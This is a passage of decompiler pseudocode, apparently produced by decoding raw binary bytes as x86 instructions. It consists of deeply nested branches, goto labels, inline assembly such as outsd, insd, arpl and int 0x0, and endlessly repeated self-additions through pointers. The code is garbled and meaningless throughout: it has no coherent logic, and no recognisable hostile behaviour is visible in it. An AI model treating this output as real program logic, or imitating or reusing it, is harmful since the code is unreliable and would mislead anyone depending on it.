                                    														 *_t285 =  *_t285 + _t285;
                                    														if( *_t285 < 0) {
                                    															L55:
                                    															_t531 = _t530 |  *(_t694 - 0x5c);
                                    															 *_t285 =  *_t285 + _t285;
                                    															_t285 = _t285 |  *_t285;
                                    															 *_t651 =  *_t651 + _t285;
                                    															 *((intOrPtr*)(_t285 + _t285 - 0x1e9fa00)) =  *((intOrPtr*)(_t285 + _t285 - 0x1e9fa00)) - _t482;
                                    															 *_t531 =  *_t531 + 1;
                                    															asm("adc ecx, [0xa4390d11]");
                                    															 *_t285 =  *_t285 + _t285;
                                    															 *((intOrPtr*)(_t694 + _t705 * 2)) =  *((intOrPtr*)(_t694 + _t705 * 2)) + _t285;
                                    															_pop(_t532);
                                    															 *_t285 =  *_t285 + _t285;
                                    															_t533 = _t532 |  *_t285;
                                    															goto L57;
                                    														} else {
                                    															_t705 = _t705 - 1;
                                    															 *_t285 =  *_t285 + _t285;
                                    															if( *_t285 < 0) {
                                    																_t533 = _t530 |  *_t285;
                                    																asm("arpl [eax], ax");
                                    																 *_t651 =  *_t651 + _t533;
                                    																_t767 =  *_t651;
                                    																if(_t767 >= 0) {
                                    																	L57:
                                    																	asm("int 0x0");
                                    																	 *_t651 =  *_t651 + _t533;
                                    																	_t534 = _t533 +  *_t285;
                                    																	_pop(_t651);
                                    																	 *_t285 =  *_t285 + _t285;
                                    																	_t482 = _t482 |  *_t694;
                                    																	_pop(ds);
                                    																	_t286 = _t285 | 0x101f101f;
                                    																	if(_t286 >= 0) {
                                    																		goto L63;
                                    																	} else {
                                    																		 *_t286 =  *_t286 + _t286;
                                    																		 *_t286 =  *_t286 + _t286;
                                    																		_t414 = (_t286 |  *_t286) + 0x6f;
                                    																		_pop(_t593);
                                    																		 *_t414 =  *_t414 + _t414;
                                    																		_t530 = _t593 |  *_t414;
                                    																		_t415 = _t482;
                                    																		_t482 = _t414;
                                    																		 *_t415 =  *_t415 + _t415;
                                    																		 *_t651 =  *_t651 - _t482;
                                    																		 *_t651 =  *_t651 + (_t593 |  *_t414);
                                    																		_pop(ds);
                                    																		_pop(ds);
                                    																		_t285 = _t415 |  *_t651 | 0x0000001f;
                                    																		asm("adc [edi], bl");
                                    																		asm("adc [ebx+0x5c], dh");
                                    																		goto L59;
                                    																	}
                                    																} else {
                                    																	 *_t285 =  *_t285 + _t285;
                                    																	_t419 = _t285 |  *0x656f17;
                                    																	 *_t651 =  *_t651 + _t533;
                                    																	 *0x666f17 =  *0x666f17 + _t419;
                                    																	 *_t651 =  *_t651 + _t533;
                                    																	_t694[0x19] = _t694[0x19] + _t533;
                                    																	 *_t419 =  *_t419 + _t419;
                                    																	_t421 = (_t419 |  *_t419) + 0x6f;
                                    																	_pop(_t595);
                                    																	 *_t421 =  *_t421 + _t421;
                                    																	_t482 = _t482 |  *_t694;
                                    																	 *_t421 =  *_t421 + _t421;
                                    																	_t530 = _t595 - _t421 |  *_t421;
                                    																	 *_t421 = 0;
                                    																	_t679 = _t651 |  *(_t482 + 0x5e);
                                    																	 *_t421 =  *_t421 + _t421;
                                    																	 *_t679 =  *_t679 - _t482;
                                    																	 *_t679 =  *_t679 + _t530;
                                    																	ds = _t421;
                                    																	_t651 = _t679 - _t482;
                                    																	_pop(ds);
                                    																	_t285 = _t421 |  *_t679 | 0x0000001f;
                                    																	asm("adc [edi], bl");
                                    																	asm("adc [ebx+0x5c], esi");
                                    																	goto L53;
                                    																}
                                    															} else {
                                    																 *_t285 =  *_t285 + _t285;
                                    																_t109 = _t530 + 0x17;
                                    																 *_t109 =  *(_t530 + 0x17) ^ _t285;
                                    																if( *_t109 >= 0) {
                                    																	L53:
                                    																	if(_t767 >= 0) {
                                    																		L59:
                                    																		 *_t285 =  *_t285 + _t285;
                                    																		 *_t285 =  *_t285 + _t285;
                                    																		_t288 = (_t285 |  *_t285) + 0x6f;
                                    																		_pop(_t534);
                                    																		 *_t288 =  *_t288 + _t288;
                                    																		_t652 = _t651 |  *(_t651 + 1);
                                    																		 *_t288 =  *_t288 + _t288;
                                    																		if( *_t288 < 0) {
                                    																			L69:
                                    																			_t410 = (_t288 |  *_t288) + 0x6f;
                                    																			 *_t410 =  *_t410 + _t410;
                                    																			_t411 = _t482;
                                    																			_t503 = _t410;
                                    																			 *_t411 =  *_t411 + _t411;
                                    																			_t412 = _t411 |  *_t652;
                                    																			 *_t652 =  *_t652 - _t503;
                                    																			_pop(_t651);
                                    																			 *_t412 =  *_t412 + _t412;
                                    																			_t482 = _t503 |  *_t694;
                                    																			_pop(ds);
                                    																			_t286 = _t412 | 0x0000001f;
                                    																			asm("adc [edi], bl");
                                    																			asm("adc [ebx+0x5c], dh");
                                    																			 *_t286 =  *_t286 + _t286;
                                    																			goto L71;
                                    																		} else {
                                    																			_t705 = _t705 - 1;
                                    																			 *_t288 =  *_t288 + _t288;
                                    																			if( *_t288 < 0) {
                                    																				_t535 = _t534 |  *_t286;
                                    																				asm("arpl [eax], ax");
                                    																				 *_t651 =  *_t651 + _t535;
                                    																				if( *_t651 >= 0) {
                                    																					L71:
                                    																					asm("outsd");
                                    																					asm("movsb");
                                    																					 *_t286 =  *_t286 + _t286;
                                    																					_t288 = (_t286 |  *_t286) + 0x6f;
                                    																					_pop(_t536);
                                    																					 *_t288 =  *_t288 + _t288;
                                    																					_t652 = _t651 |  *(_t651 + 1);
                                    																					 *_t288 =  *_t288 + _t288;
                                    																					if( *_t288 < 0) {
                                    																						L81:
                                    																						_t537 = _t536 |  *(_t694 - 0x5c);
                                    																						 *_t288 =  *_t288 + _t288;
                                    																						_t288 = _t288 |  *_t288;
                                    																						 *_t652 =  *_t652 + _t537;
                                    																						 *_t482 =  *_t482 + _t652;
                                    																						 *0x14c00 =  *0x14c00 ^ _t288;
                                    																						 *_t288 =  *_t288 + _t288;
                                    																						 *_t652 =  *_t652 + _t537;
                                    																						 *_t288 =  *_t288 + _t288;
                                    																						asm("adc [eax], eax");
                                    																						asm("adc al, [eax]");
                                    																						_push(ss);
                                    																						_t538 = _t537 +  *_t288;
                                    																						_t652 = ss;
                                    																						 *_t288 =  *_t288 + _t288;
                                    																						_t482 = _t482 |  *_t694;
                                    																						goto L83;
                                    																					} else {
                                    																						_t705 = _t705 - 1;
                                    																						 *_t288 =  *_t288 + _t288;
                                    																						if( *_t288 < 0) {
                                    																							_t538 = _t536 |  *_t288;
                                    																							asm("arpl [eax], ax");
                                    																							 *_t652 =  *_t652 + _t538;
                                    																							if( *_t652 >= 0) {
                                    																								L83:
                                    																								_pop(ds);
                                    																								_t700 = _t700 + 1;
                                    																								asm("fiadd dword [edx]");
                                    																								 *((intOrPtr*)(_t652 + 0x28060000)) =  *((intOrPtr*)(_t652 + 0x28060000)) - _t288;
                                    																								 *_t288 =  *_t288 + _t288;
                                    																								 *_t482 =  *_t482 + _t288;
                                    																								asm("outsd");
                                    																								asm("insd");
                                    																								 *_t288 =  *_t288 + _t288;
                                    																								_t289 = _t288 |  *_t482;
                                    																								asm("outsd");
                                    																								asm("outsb");
                                    																								 *_t289 =  *_t289 + _t289;
                                    																								_t654 = _t652 |  *_t652 |  *(_t482 - 0x70);
                                    																								 *_t289 =  *_t289 + _t289;
                                    																								_t536 = _t538 |  *_t289;
                                    																								 *_t654 =  *_t654 + _t536;
                                    																								_t292 =  *_t694 - 0x1f;
                                    																								_t652 = _t654 +  *_t694;
                                    																								if(_t652 >= 0) {
                                    																									goto L88;
                                    																								} else {
                                    																									 *_t292 =  *_t292 + _t292;
                                    																									_t398 = _t292 + 2;
                                    																									_t706 = _t705 + _t694[0x1b];
                                    																									 *_t398 =  *_t398 + _t398;
                                    																									_t288 = _t398 |  *_t482;
                                    																									goto L85;
                                    																								}
                                    																							} else {
                                    																								 *_t288 =  *_t288 + _t288;
                                    																								_t402 = _t288 |  *0x656f17;
                                    																								 *_t652 =  *_t652 + _t538;
                                    																								 *0x666f17 =  *0x666f17 + _t402;
                                    																								 *_t652 =  *_t652 + _t538;
                                    																								_t694[0x19] = _t694[0x19] + _t538;
                                    																								 *_t402 =  *_t402 + _t402;
                                    																								_t404 = (_t402 |  *_t402) + 0x6f;
                                    																								_pop(_t584);
                                    																								 *_t404 =  *_t404 + _t404;
                                    																								_t482 = _t482 |  *_t694;
                                    																								 *_t404 =  *_t404 + _t404;
                                    																								_t536 = _t584 - _t404 |  *_t404;
                                    																								 *_t404 = 0;
                                    																								_t652 = _t652 |  *(_t482 + 0x5e);
                                    																								 *_t404 =  *_t404 + _t404;
                                    																								_t405 = _t404 |  *_t652;
                                    																								 *_t652 =  *_t652 - _t482;
                                    																								 *_t652 =  *_t652 + _t536;
                                    																								ds = _t404;
                                    																								_t795 = _t405 - 0xda;
                                    																								_pop(ds);
                                    																								_t288 = _t405 | 0x0000001f;
                                    																								asm("adc [edi], bl");
                                    																								asm("adc [ebx+0x5c], esi");
                                    																								goto L79;
                                    																							}
                                    																						} else {
                                    																							 *_t288 =  *_t288 + _t288;
                                    																							_t139 = _t536 + 0x17;
                                    																							 *_t139 =  *(_t536 + 0x17) ^ _t288;
                                    																							if( *_t139 >= 0) {
                                    																								L79:
                                    																								if(_t795 >= 0) {
                                    																									L85:
                                    																									asm("outsd");
                                    																									asm("outsb");
                                    																									 *_t288 =  *_t288 + _t288;
                                    																									_t677 = _t652 |  *(_t482 - 0x70);
                                    																									 *_t288 =  *_t288 + _t288;
                                    																									_t484 = _t482 |  *(_t706 + 0x4d);
                                    																									 *_t288 =  *_t288 + _t288;
                                    																									_t399 = _t288;
                                    																									 *_t484 =  *_t484 + _t399;
                                    																									asm("outsd");
                                    																									if ( *_t484 < 0) goto L86;
                                    																									 *_t677 =  *_t677 + _t536;
                                    																									 *_t399 =  *_t399 & _t399;
                                    																									 *_t399 =  *_t399 + _t677;
                                    																									_t675 = _t677 + _t484;
                                    																									 *((intOrPtr*)(_t399 + _t536)) =  *((intOrPtr*)(_t399 + _t536)) + _t536;
                                    																									 *_t399 =  *_t399 + _t399;
                                    																									 *_t675 =  *_t675 + _t399;
                                    																									 *_t675 =  *_t675 - _t484;
                                    																									 *_t675 =  *_t675 + _t536;
                                    																									_pop(ds);
                                    																									asm("adc al, 0xda");
                                    																									_pop(ds);
                                    																									_t396 = _t399 | 0x101f101f;
                                    																									if(_t396 >= 0) {
                                    																										L90:
                                    																										 *_t396 =  *_t396 + _t396;
                                    																										_t676 = _t675 |  *_t700;
                                    																										 *_t536 =  *_t536 + 1;
                                    																										asm("adc eax, [esi]");
                                    																										asm("adc [esi], eax");
                                    																										_t397 = _t396 - 0x10;
                                    																										_t582 = _t536 +  *_t397;
                                    																										_t294 = _t397;
                                    																										 *_t294 =  *_t294 + _t294;
                                    																										_t502 = _t484 |  *_t294;
                                    																										asm("outsd");
                                    																										asm("rol dword [eax], 1");
                                    																										 *_t676 =  *_t676 + _t582;
                                    																										 *_t294 =  *_t294 + _t294;
                                    																										_t583 = _t582 -  *_t694;
                                    																										 *_t676 =  *_t676 + _t294;
                                    																										 *((intOrPtr*)(_t294 + 0x160a0000)) =  *((intOrPtr*)(_t294 + 0x160a0000)) - _t502;
                                    																										asm("outsd");
                                    																										asm("rol dword [eax], 1");
                                    																										 *_t676 =  *_t676 + _t583;
                                    																										 *_t294 =  *_t294 + _t294;
                                    																										 *_t294 =  *_t294 + _t294;
                                    																										_t541 = _t583 +  *_t294;
                                    																										_pop(_t656);
                                    																										 *_t294 =  *_t294 + _t294;
                                    																										_t484 = _t502 |  *_t694;
                                    																									} else {
                                    																										 *_t396 =  *_t396 + _t396;
                                    																										_t401 = _t396 + 0x15;
                                    																										asm("outsd");
                                    																										asm("insd");
                                    																										 *_t401 =  *_t401 + _t401;
                                    																										_t292 = _t401 |  *_t484;
                                    																										L88:
                                    																										_t706 = _t705 + _t694[0x1b];
                                    																										 *_t292 =  *_t292 + _t292;
                                    																										asm("outsd");
                                    																										 *_t292 =  *_t292 + _t292;
                                    																										_t540 = _t536 |  *_t292 |  *0x16082c09;
                                    																										 *_t292 =  *_t292 + _t292;
                                    																										_t293 = _t292 |  *_t292;
                                    																										 *_t293 =  *_t293 + _t293;
                                    																										_t541 = _t540 +  *_t293;
                                    																										_pop(_t655);
                                    																										 *_t293 =  *_t293 + _t293;
                                    																										_t484 = _t482 - _t540 |  *_t694;
                                    																										_t656 = _t655 - _t484;
                                    																										_pop(ds);
                                    																										_t294 = _t293 | 0x101f101f;
                                    																										if(_t294 < 0) {
                                    																											 *_t294 =  *_t294 + _t294;
                                    																											_t393 = _t294 + 0x15;
                                    																											asm("outsd");
                                    																											asm("insd");
                                    																											 *_t393 =  *_t393 + _t393;
                                    																											_t394 = _t393 |  *_t484;
                                    																											asm("outsd");
                                    																											asm("outsb");
                                    																											 *_t394 =  *_t394 + _t394;
                                    																											asm("outsd");
                                    																											 *_t394 =  *_t394 + _t394;
                                    																											_t675 = _t656 |  *_t484 |  *_t484;
                                    																											_t395 = _t394 + 0x342c0511;
                                    																											_t396 = _t395;
                                    																											 *_t396 =  *_t396 + _t396;
                                    																											_t536 = (_t541 |  *_t394) +  *_t395 |  *(_t694 - 0x30);
                                    																											goto L90;
                                    																										}
                                    																									}
                                    																								} else {
                                    																									 *_t288 =  *_t288 + _t288;
                                    																									goto L81;
                                    																								}
                                    																							} else {
                                    																								 *_t288 =  *_t288 + _t288;
                                    																								_t536 = _t536 |  *_t288;
                                    																								asm("into");
                                    																								 *_t288 =  *_t288 + _t288;
                                    																								 *_t652 =  *_t652 - _t482;
                                    																								 *_t652 =  *_t652 + _t536;
                                    																								_pop(ds);
                                    																								_pop(ds);
                                    																								_t288 = _t288 |  *_t652 | 0x101f101f;
                                    																								goto L75;
                                    																							}
                                    																						}
                                    																					}
                                    																				} else {
                                    																					 *_t286 =  *_t286 + _t286;
                                    																					_t407 = _t286 |  *0x656f17;
                                    																					 *_t651 =  *_t651 + _t535;
                                    																					 *0x666f17 =  *0x666f17 + _t407;
                                    																					 *_t651 =  *_t651 + _t535;
                                    																					_t694[0x19] = _t694[0x19] + _t535;
                                    																					 *_t407 =  *_t407 + _t407;
                                    																					_t408 = _t407 |  *_t407;
                                    																					 *_t408 =  *_t408 + _t482;
                                    																					asm("rol dword [eax], 1");
                                    																					 *_t408 =  *_t408 + _t408;
                                    																					 *((intOrPtr*)(_t694 + _t705 * 2)) =  *((intOrPtr*)(_t694 + _t705 * 2)) + _t408;
                                    																					_pop(_t586);
                                    																					 *_t408 =  *_t408 + _t408;
                                    																					_t587 = _t586 |  *_t408;
                                    																					asm("int 0x0");
                                    																					 *_t651 =  *_t651 + _t587;
                                    																					_t536 = _t587 +  *_t408;
                                    																					_pop(_t652);
                                    																					 *_t408 =  *_t408 + _t408;
                                    																					_t482 = _t482 |  *_t694;
                                    																					_pop(ds);
                                    																					_t288 = _t408 | 0x101f101f;
                                    																					if(_t288 >= 0) {
                                    																						L75:
                                    																						asm("adc [ebx+0x5c], dh");
                                    																					} else {
                                    																						 *_t288 =  *_t288 + _t288;
                                    																						goto L68;
                                    																					}
                                    																				}
                                    																			} else {
                                    																				 *_t288 =  *_t288 + _t288;
                                    																				_t127 = _t534 + 0x17;
                                    																				 *_t127 =  *(_t534 + 0x17) ^ _t288;
                                    																				if( *_t127 >= 0) {
                                    																					L68:
                                    																					asm("outsd");
                                    																					asm("movsb");
                                    																					 *_t288 =  *_t288 + _t288;
                                    																					goto L69;
                                    																				} else {
                                    																					 *_t288 =  *_t288 + _t288;
                                    																					_t534 = _t534 |  *_t288;
                                    																					asm("into");
                                    																					 *_t288 =  *_t288 + _t288;
                                    																					 *_t652 =  *_t652 - _t482;
                                    																					 *_t652 =  *_t652 + _t534;
                                    																					_pop(ds);
                                    																					_pop(ds);
                                    																					_t286 = _t288 |  *_t652 | 0x101f101f;
                                    																					L63:
                                    																					asm("adc [ebx+0x5c], dh");
                                    																				}
                                    																			}
                                    																		}
                                    																	} else {
                                    																		 *_t285 =  *_t285 + _t285;
                                    																		goto L55;
                                    																	}
                                    																} else {
                                    																	 *_t285 =  *_t285 + _t285;
                                    																	_t530 = _t530 |  *_t285;
                                    																	asm("into");
                                    																	 *_t285 =  *_t285 + _t285;
                                    																	_t423 = _t285 |  *_t651;
                                    																	 *_t651 =  *_t651 - _t482;
                                    																	 *_t651 =  *_t651 + _t530;
                                    																	_pop(ds);
                                    																	_t651 = _t651 - _t482;
                                    																	_pop(ds);
                                    																	_t285 = _t423 | 0x101f101f;
                                    																	goto L49;
                                    																}
                                    															}
                                    														}
                                    													} else {
                                    														 *_t283 =  *_t283 + _t283;
                                    														_t424 = _t283 |  *0x656f17;
                                    														 *_t650 =  *_t650 + _t529;
                                    														 *0x666f17 =  *0x666f17 + _t424;
                                    														 *_t650 =  *_t650 + _t529;
                                    														_t694[0x19] = _t694[0x19] + _t529;
                                    														 *_t424 =  *_t424 + _t424;
                                    														_t425 = _t424 |  *_t424;
                                    														 *_t425 =  *_t425 + _t482;
                                    														asm("rol dword [eax], 1");
                                    														 *_t425 =  *_t425 + _t425;
                                    														 *((intOrPtr*)(_t694 + _t705 * 2)) =  *((intOrPtr*)(_t694 + _t705 * 2)) + _t425;
                                    														_pop(_t597);
                                    														 *_t425 =  *_t425 + _t425;
                                    														_t598 = _t597 |  *_t425;
                                    														asm("int 0x0");
                                    														 *_t650 =  *_t650 + _t598;
                                    														_t530 = _t598 +  *_t425;
                                    														_pop(_t680);
                                    														 *_t425 =  *_t425 + _t425;
                                    														_t482 = _t482 |  *_t694;
                                    														_t651 = _t680 - _t482;
                                    														_pop(ds);
                                    														_t285 = _t425 | 0x101f101f;
                                    														if(_t285 >= 0) {
                                    															L49:
                                    															asm("adc [ebx+0x5c], dh");
                                    														} else {
                                    															 *_t285 =  *_t285 + _t285;
                                    															goto L42;
                                    														}
                                    													}
                                    												} else {
                                    													 *_t285 =  *_t285 + _t285;
                                    													_t97 = _t528 + 0x17;
                                    													 *_t97 =  *(_t528 + 0x17) ^ _t285;
                                    													if( *_t97 >= 0) {
                                    														L42:
                                    														asm("outsd");
                                    														asm("movsb");
                                    														 *_t285 =  *_t285 + _t285;
                                    														goto L43;
                                    													} else {
                                    														 *_t285 =  *_t285 + _t285;
                                    														_t528 = _t528 |  *_t285;
                                    														asm("into");
                                    														 *_t285 =  *_t285 + _t285;
                                    														 *_t651 =  *_t651 - _t482;
                                    														 *_t651 =  *_t651 + _t528;
                                    														_pop(ds);
                                    														_t650 = _t651 - _t482;
                                    														_pop(ds);
                                    														_t283 = _t285 |  *_t651 | 0x101f101f;
                                    														L37:
                                    														asm("adc [ebx+0x5c], dh");
                                    													}
                                    												}
                                    											}
                                    										} else {
                                    											 *_t281 =  *_t281 + _t281;
                                    											L30:
                                    											 *_t281 =  *_t281 + _t281;
                                    											_t282 = _t281 |  *_t281;
                                    											 *_t648 =  *_t648 + _t282;
                                    											 *((intOrPtr*)(_t648 + 0x16060000)) =  *((intOrPtr*)(_t648 + 0x16060000)) - _t482;
                                    											 *(_t524 |  *(_t694 - 0x5c)) =  *(_t524 |  *(_t694 - 0x5c)) + 1;
                                    											asm("adc ecx, [ecx+edx]");
                                    											_t281 = _t282 | 0x00000039;
                                    											asm("movsb");
                                    											 *_t281 =  *_t281 + _t281;
                                    											 *((intOrPtr*)(_t694 + _t705 * 2)) =  *((intOrPtr*)(_t694 + _t705 * 2)) + _t281;
                                    											_pop(_t526);
                                    											 *_t281 =  *_t281 + _t281;
                                    											_t527 = _t526 |  *_t281;
                                    											goto L31;
                                    										}
                                    									}
                                    								} else {
                                    									 *_t281 =  *_t281 + _t281;
                                    									goto L19;
                                    								}
                                    							}
                                    						} else {
                                    							 *_t281 =  *_t281 + _t281;
                                    							_t69 = _t522 + 0x17;
                                    							 *_t69 =  *(_t522 + 0x17) & _t281;
                                    							if( *_t69 >= 0) {
                                    								L19:
                                    								asm("outsd");
                                    								asm("movsb");
                                    								 *_t281 =  *_t281 + _t281;
                                    								goto L20;
                                    							} else {
                                    								 *_t281 =  *_t281 + _t281;
                                    								_t522 = _t522 |  *_t281;
                                    								asm("into");
                                    								 *_t281 =  *_t281 + _t281;
                                    								_t279 = _t281 |  *_t648;
                                    								 *_t648 =  *_t648 - _t482;
                                    								 *_t648 =  *_t648 + _t522;
                                    								_pop(ds);
                                    								asm("adc al, 0xda");
                                    								_pop(ds);
                                    								_t482 = _t482 |  *_t694;
                                    								asm("adc [edi], bl");
                                    								goto L15;
                                    							}
                                    						}
                                    					}
                                    				}
                                    				_pop(ds);
                                    				_t295 = _t294 | 0x101f101f;
                                    				if(_t295 >= 0) {
                                    					L96:
                                    					asm("insd");
                                    					 *_t295 =  *_t295 + _t295;
                                    					 *_t295 =  *_t295 + _t295;
                                    					_t296 = _t295 + 2;
                                    					_t707 = _t706 + _t694[0x1b];
                                    					 *_t296 =  *_t296 + _t296;
                                    					_t484 = _t484 |  *(_t706 + 0x4f) |  *(_t707 + 0x50);
                                    					 *_t296 =  *_t296 + _t296;
                                    					 *_t656 =  *_t656 - _t484;
                                    					 *_t656 =  *_t656 + _t541;
                                    					_pop(ds);
                                    					asm("adc al, 0xda");
                                    					_pop(ds);
                                    					_t298 = _t296 + 0x00000002 | 0x101f101f;
                                    					if(_t298 >= 0) {
                                    						goto L100;
                                    					} else {
                                    						 *_t298 =  *_t298 + _t298;
                                    						_t574 = _t541 |  *_t484;
                                    						asm("adc al, [ecx]");
                                    						_t712 = _t707 + _t694[0x1b];
                                    						 *_t298 =  *_t298 + _t298;
                                    						goto L98;
                                    					}
                                    				} else {
                                    					 *_t295 =  *_t295 + _t295;
                                    					_t386 = _t295 + 0x15;
                                    					asm("outsd");
                                    					asm("insd");
                                    					 *_t386 =  *_t386 + _t386;
                                    					_t387 = _t386 |  *_t484;
                                    					asm("outsd");
                                    					asm("outsb");
                                    					 *_t387 =  *_t387 + _t387;
                                    					asm("outsd");
                                    					 *_t387 =  *_t387 + _t387;
                                    					_pop(es);
                                    					asm("adc [edi], eax");
                                    					_t388 = _t387 - 0xe;
                                    					_t574 = (_t541 |  *_t387) +  *_t388;
                                    					_t298 = _t388;
                                    					 *_t298 =  *_t298 + _t298;
                                    					_t656 = _t656 |  *_t484 |  *_t484 |  *_t694;
                                    					asm("outsd");
                                    					asm("rol dword [eax], 1");
                                    					 *_t656 =  *_t656 + _t574;
                                    					 *_t298 =  *_t298 + _t298;
                                    					 *_t298 =  *_t298 + _t298;
                                    					 *_t656 =  *_t656 + _t298;
                                    					_t712 = _t706 +  *_t298;
                                    					if (_t712 >= 0) goto L93;
                                    					 *_t656 =  *_t656 + _t574;
                                    					 *_t656 =  *_t656 + _t574;
                                    					_t700 = _t700 + 1;
                                    					 *_t656 =  *_t656 + _t298;
                                    					_push(ss);
                                    					if( *_t656 >= 0) {
                                    						L98:
                                    						 *_t656 =  *_t656 + _t574;
                                    						_t707 = _t712 + _t694[0x1b];
                                    						 *_t298 =  *_t298 + _t298;
                                    						asm("outsd");
                                    						 *_t298 =  *_t298 + _t298;
                                    						_push(es);
                                    						_t382 = _t298 - 0x17;
                                    						_t671 = _t656 +  *_t694;
                                    						_t694[0x18000] = _t694[0x18000] - _t484;
                                    						_t577 = (_t574 |  *_t298 |  *_t656) +  *_t382;
                                    						 *_t382 =  *_t382 + 0x826f0a00;
                                    						 *_t382 =  *_t382 + _t382;
                                    						_t383 = _t382 |  *_t382;
                                    						 *_t484 =  *_t484 + _t577;
                                    						 *_t671 =  *_t671 + _t383;
                                    						_t694[0x18000] = _t694[0x18000] - _t484;
                                    						 *_t383 =  *_t383;
                                    						_t569 = _t577 +  *_t383 |  *(_t694 - 0x7e);
                                    						 *_t383 =  *_t383 + _t383;
                                    						_t384 = _t383 |  *_t383;
                                    						 *_t671 =  *_t671 + _t384;
                                    						 *_t671 =  *_t671 - _t484;
                                    						 *_t671 =  *_t671 + _t569;
                                    						ds = ss;
                                    						_t658 = _t671 - _t484;
                                    						ds = ss;
                                    						_t303 = _t384 | 0x101f101f;
                                    						if(_t303 >= 0) {
                                    							L102:
                                    							_t658 = _t658 |  *_t658;
                                    							 *_t484 =  *_t484 + _t303;
                                    							asm("outsd");
                                    							asm("insd");
                                    							 *_t303 =  *_t303 + _t303;
                                    							_t377 = _t303 |  *_t484;
                                    							asm("outsd");
                                    							asm("outsb");
                                    							 *_t377 =  *_t377 + _t377;
                                    							asm("outsd");
                                    							 *_t377 =  *_t377 + _t377;
                                    							_pop(ss);
                                    							 *((intOrPtr*)(_t707 + 0x60000)) =  *((intOrPtr*)(_t707 + 0x60000)) - _t484;
                                    							_t572 = (_t569 |  *_t377 |  *0x2172c09) +  *_t377;
                                    							 *_t377 =  *_t377 + 0x826f0a00;
                                    							 *_t377 =  *_t377 + _t377;
                                    							_t378 = _t377 |  *_t377;
                                    							 *_t484 =  *_t484 + _t572;
                                    							_push(ss);
                                    							 *_t658 =  *_t658 + _t378;
                                    							_push(ss);
                                    							 *((intOrPtr*)(_t707 + 0x60000)) =  *((intOrPtr*)(_t707 + 0x60000)) - _t484;
                                    							 *_t378 =  *_t378;
                                    							_t546 = _t572 +  *_t378 |  *(_t694 - 0x7e);
                                    							 *_t378 =  *_t378 + _t378;
                                    							_t376 = _t378 |  *_t378;
                                    							 *_t658 =  *_t658 + _t376;
                                    							if( *_t658 != 0) {
                                    								goto L109;
                                    							} else {
                                    								 *_t376 =  *_t376 + _t376;
                                    								_t700 = _t700 + 1;
                                    								_t303 = _t376 + 0x50 +  *_t484;
                                    								asm("outsd");
                                    								 *_t658 =  *_t658 + _t546;
                                    								 *((intOrPtr*)(_t546 + 0x130a0000)) =  *((intOrPtr*)(_t546 + 0x130a0000)) - _t546;
                                    								goto L104;
                                    							}
                                    						} else {
                                    							 *_t303 =  *_t303 + _t303;
                                    							_t541 = _t569 |  *_t484;
                                    							L100:
                                    							 *_t484 =  *_t484 + _t298;
                                    							asm("outsd");
                                    							asm("insd");
                                    							 *_t298 =  *_t298 + _t298;
                                    							_t299 = _t298 |  *_t484;
                                    							asm("outsd");
                                    							asm("outsb");
                                    							 *_t299 =  *_t299 + _t299;
                                    							asm("outsd");
                                    							 *_t299 =  *_t299 + _t299;
                                    							_t300 = _t299 - 0x17;
                                    							_t658 = (_t656 |  *_t656) +  *_t694;
                                    							 *((intOrPtr*)(_t484 + 0x60000)) =  *((intOrPtr*)(_t484 + 0x60000)) - _t484;
                                    							_t544 = (_t541 |  *_t299 |  *(_t299 + (_t541 |  *_t299))) +  *_t300;
                                    							 *_t300 =  *_t300 + 0x826f0a00;
                                    							 *_t300 =  *_t300 + _t300;
                                    							_t301 = _t300 |  *_t300;
                                    							 *_t484 =  *_t484 + _t544;
                                    							 *_t658 =  *_t658 + _t301;
                                    							 *((intOrPtr*)(_t484 + 0x60000)) =  *((intOrPtr*)(_t484 + 0x60000)) - _t484;
                                    							 *_t301 =  *_t301;
                                    							_t546 = _t544 +  *_t301 |  *(_t694 - 0x7e);
                                    							 *_t301 =  *_t301 + _t301;
                                    							_t302 = _t301 |  *_t301;
                                    							 *_t658 =  *_t658 + _t302;
                                    							 *_t658 =  *_t658 - _t484;
                                    							 *_t658 =  *_t658 + _t546;
                                    							ds = ss;
                                    							ds = ss;
                                    							_t303 = _t302 | 0x101f101f;
                                    							if(_t303 >= 0) {
                                    								L104:
                                    								 *_t658 =  *_t658 + _t546;
                                    								asm("adc al, [0x7d28]");
                                    								_t305 = _t303 + 0x00982802 |  *_t658;
                                    								if(_t305 < 0) {
                                    									L111:
                                    									_t484 = _t484 +  *((intOrPtr*)(_t484 + 0x52));
                                    									 *_t305 =  *_t305 + _t305;
                                    									 *_t658 =  *_t658 + _t546;
                                    									_t307 = _t305 + 0x0000002b &  *_t658;
                                    									_t694 = _t694 +  *((intOrPtr*)(_t707 + 0x52));
                                    									 *_t307 =  *_t307 + _t307;
                                    									_t308 = _t307 + 0x2a;
                                    									 *_t308 =  *_t308 + _t308;
                                    								} else {
                                    									 *_t305 =  *_t305 + _t305;
                                    									_t373 = _t305 + 0x28;
                                    									if (_t373 >= 0) goto L106;
                                    									 *_t658 =  *_t658 + _t546;
                                    									asm("ficom dword [edx]");
                                    									_t308 = _t373 + 0x00007e28 |  *_t658;
                                    									if(_t308 >= 0) {
                                    										 *_t308 =  *_t308 + _t308;
                                    										_t375 = _t308 + 0x28;
                                    										if (_t375 <= 0) goto L108;
                                    										 *_t658 =  *_t658 + _t546;
                                    										asm("fidiv dword [ebx-0x70]");
                                    										 *_t375 =  *_t375 + _t375;
                                    										_t546 = _t546 |  *(_t694 - 0x56);
                                    										 *_t375 =  *_t375 + _t375;
                                    										_t376 = _t375 |  *_t375;
                                    										L109:
                                    										 *_t376 =  *_t376 + _t376;
                                    										_t314 = _t376 +  *_t484;
                                    										 *_t484 =  *_t484 - _t658;
                                    										 *_t658 =  *_t658 + _t546;
                                    										 *_t658 =  *_t658 + _t314;
                                    										 *((intOrPtr*)(_t314 + _t314)) =  *((intOrPtr*)(_t314 + _t314)) - _t658;
                                    										L110:
                                    										_t316 = (_t314 |  *_t314) -  *_t700;
                                    										 *_t316 =  *_t316 + _t316;
                                    										 *_t658 =  *_t658 + _t546;
                                    										_t318 = _t316 + 0x0000002b &  *_t658;
                                    										_t694 = _t694 +  *((intOrPtr*)(_t707 + 0x51));
                                    										 *_t318 =  *_t318 + _t318;
                                    										_t305 = _t318 + 0x2a;
                                    										_t484 = _t484 +  *((intOrPtr*)(_t484 + 0x51)) +  *[es:ebx+0x52];
                                    										goto L111;
                                    									}
                                    								}
                                    							} else {
                                    								 *_t303 =  *_t303 + _t303;
                                    								_t569 = _t546 |  *_t484;
                                    								goto L102;
                                    							}
                                    						}
                                    					} else {
                                    						 *_t298 =  *_t298 + _t298;
                                    						_t389 = _t298 + 2;
